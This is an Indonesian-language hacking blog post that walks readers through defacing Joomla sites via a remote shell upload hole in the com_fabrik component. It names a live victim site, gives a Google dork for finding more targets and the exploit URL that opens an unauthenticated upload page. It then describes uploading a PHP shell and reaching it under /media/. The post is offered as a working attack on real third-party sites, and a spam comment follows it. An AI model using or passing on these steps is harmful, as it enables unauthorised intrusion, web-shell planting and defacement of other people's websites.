Facebook Twitter RSS
banner

Minggu, 26 Mei 2013

Deface Joomla Component (com_Fabrik) Remote Shell Upload Vulnerability

Live Target:
 http://sercaca.com/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=1&Itemid=0

1. Gunakan Dork untuk mencari Target di Google 
inurl:index.php?option=com_fabrik



 2. Selanjutnya Pilih target sobat, disini ane udah nemu target... langsung aja di eksploitasi :D



3. Masukin exploitnya berikut;
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
maka akan muncul halaman upload seperti gambar berikut:


Note: Kalo tidak muncul halaman seperti gambar atau error, silahkan cari target yg lain! :p

4. upload shell sobat, klik Browse dan pilih shell sobat lalu klik Import CSV



5. Setelah itu lihat hasil upload shell sobat di http://site.com/media/shell.php




 Note: Kalo ga berhasil atau error, cari target lain aja :D

7. Goodluck! :p
Video Tutorial >>> LIHAT



SHARE THIS POST

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author: admin
Lorem ipsum dolor sit amet, contetur adipcing elit, sed do eiusmod temor incidunt ut labore et dolore agna aliqua. Lorem ipsum dolor sit amet.

1 komentar:

  1. whoah this blog is great i really like reading your articles.

    Stay up the great work! You know, lots of people
    are hunting round for this information, you could help them greatly.


    Review my weblog :: Recover Twitter Password Tutorial

    BalasHapus